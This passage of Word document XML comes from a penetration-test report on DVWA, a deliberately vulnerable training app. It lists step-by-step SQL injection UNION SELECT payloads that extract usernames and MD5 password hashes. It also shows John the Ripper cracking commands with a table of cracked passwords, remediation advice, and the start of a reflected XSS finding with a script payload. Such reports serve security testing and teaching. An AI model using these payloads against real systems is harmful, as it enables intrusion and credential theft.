          <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="EFEFEF" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1' UNION SELECT 'a','b'-- -</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4762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457450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 1: UNION SELECT confirms both columns ('a', 'b') are reflected in the application response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4 — Enumerate the current database and database user:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="EFEFEF" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1' UNION SELECT database(), user()-- -</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4762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971675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 2: Database identified as 'dvwa', running under the 'root@localhost' MySQL account — indicating the application connects to the database with full administrative privileges.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5 — Enumerate database tables via information_schema:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="EFEFEF" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1' UNION SELECT table_name, table_schema FROM information_schema.tables WHERE table_schema=database()-- -</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="20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133600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 3: Enumeration reveals two application tables — 'guestbook' and 'users' — the latter being the primary target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 6 — Extract usernames and password hashes from the users table:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="EFEFEF" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1' UNION SELECT user, password FROM users-- -</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="20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295525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 4: Full extraction of all application usernames and their MD5 password hashes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Extracted Credentials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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2500"/>
            <w:shd w:fill="1F2A44" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6000"/>
            <w:shd w:fill="1F2A44" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">MD5 Password Hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">5f4dcc3b5aa765d61d8327deb882cf99</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">gordonb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">e99a18c428cb38d5f260853678922e03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">1337</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">8d3533d75ae2c3966d7e0d4fcc69216b</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">pablo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">0d107d09f5bbe40cade3de5c71e9e9b7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">smithy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6000"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">5f4dcc3b5aa765d61d8327deb882cf99</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Note: The 'admin' and 'smithy' accounts share an identical password hash, indicating password reuse across separate accounts — a finding independent of the SQL injection vulnerability itself but relevant to overall account security posture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Post-Exploitation — Password Cracking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To demonstrate full real-world impact, the extracted MD5 hashes were cracked offline using John the Ripper with the rockyou.txt dictionary:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="EFEFEF" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">john --show --format=raw-md5 hashes.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="20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810000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5: All four unique password hashes cracked within seconds using John the Ripper.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cracked Credentials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shd w:fill="1F2A44" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4250"/>
            <w:shd w:fill="1F2A44" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Plaintext Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4250"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4250"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4250"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">gordonb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4250"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">abc123</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4250"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">pablo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4250"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">letmein</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4250"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">1337</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4250"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">charley</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4250"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">smithy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4250"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Complete disclosure of the application's user database, including authentication credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Because the database connection uses a root-privileged MySQL account, an attacker is not limited to the users table — full read access (and potentially write access) to every database on the MySQL server is possible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Recovered plaintext credentials could be reused to log into the DVWA admin panel, and — due to common password reuse habits — potentially against other services if the same credentials are shared elsewhere.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">All four unique password hashes were cracked in under a second using a common wordlist, showing the passwords in use offer effectively no protection once hashes are exposed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use parameterized queries / prepared statements for all database access — never concatenate user input directly into SQL strings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply the principle of least privilege: the application's database account should have only the minimum permissions required (e.g., SELECT on specific tables), never a root/administrative account.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enforce strong password policies (minimum length, complexity, and rejection of common/dictionary passwords) for all application accounts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use a modern, salted password hashing algorithm (e.g., bcrypt or Argon2) instead of unsalted MD5, which is cryptographically broken and trivially reversible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement a Web Application Firewall (WAF) and input validation as defense-in-depth, in addition to (not instead of) fixing the underlying query construction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 Cross-Site Scripting (Reflected) — Name Parameter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="E67E22" w:val="clear"/>
        <w:spacing w:after="100" w:before="100"/>
        <w:ind w:left="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">SEVERITY: HIGH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2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">/dvwa/vulnerabilities/xss_r/  (Name input field)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">CWE-79: Cross-Site Scripting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">A03:2021 - Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">name (GET parameter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The application accepts a 'name' value and reflects it directly back into the HTML response without sanitization or encoding. This allows an attacker to inject arbitrary HTML/JavaScript that executes in the victim's browser in the context of the vulnerable site.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploitation Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 — Confirm baseline behavior by submitting a normal name, then inject a script payload:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="EFEFEF" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4762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457450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
